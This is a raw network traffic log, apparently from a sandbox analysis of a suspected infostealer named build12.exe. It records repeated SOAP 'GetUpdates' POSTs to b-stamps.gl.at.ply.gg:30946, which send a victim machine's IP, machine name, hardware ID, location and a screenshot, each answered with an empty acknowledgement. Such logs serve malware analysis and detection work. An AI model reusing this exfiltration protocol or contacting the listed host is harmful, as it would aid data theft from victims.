                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.371130943 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.021238089 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.398436069 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.998579979 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.201956987 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.602530003 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.410851002 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      253192.168.2.550094147.185.221.19309465608C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.371131897 CEST248OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:09.034512043 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.192931890 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.497421026 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.097130060 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
